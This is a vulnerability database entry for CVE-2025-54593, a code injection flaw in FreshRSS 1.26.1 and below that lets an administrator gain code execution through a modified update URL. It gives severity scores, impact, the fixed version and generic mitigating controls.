CVE-2025-54593
Published: 01 August 2025
Summary
CVE-2025-54593 is a high-severity Code Injection (CWE-94) vulnerability in Freshrss Freshrss. Its CVSS base score is 7.2 (High).
Operationally, ranked in the top 15.9% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
Deeper analysis
FreshRSS, a self-hostable RSS aggregator, contains a code injection vulnerability (CWE-94) in versions 1.26.1 and below. An authenticated administrator can supply a malicious update URL that the application fetches and executes during an update operation, resulting in arbitrary code execution on the server with the privileges of the FreshRSS process.
An attacker who already possesses administrator credentials can therefore exfiltrate hashed passwords and other user data, modify files to deface the instance where permissions allow, or inject further code to capture plaintext credentials on subsequent logins. The attack requires network access to the administrative interface but no other user interaction.
The vulnerability is fixed in FreshRSS 1.26.2. The project’s security advisory, release notes, and the referenced commit and pull request describe the patch that prevents modification of the update URL from leading to arbitrary code execution.
EPSS remains flat at a low value of 0.0202 with no material increase after disclosure.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-23380
Vulnerability details
FreshRSS is a free, self-hostable RSS aggregator. In versions 1.26.1 and below, an authenticated administrator user can execute arbitrary code on the FreshRSS server by modifying the update URL to one they control, and gain code execution after running an…
more
update. After successfully executing code, user data including hashed passwords can be exfiltrated, the instance can be defaced when file permissions allow. Malicious code can be inserted into the instance to steal plaintext passwords, among others. This is fixed in version 1.26.2.
- CWE(s)
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
Makes persistent code injection into loaded programs impossible when the executable image itself resides on hardware-protected read-only media.
Dynamically generated code can be produced and executed inside the isolated chamber, preventing host compromise from code-injection payloads.
Validates inputs used in dynamic code generation to block injected directives.
Directly prevents execution of attacker-supplied code written into data memory regions.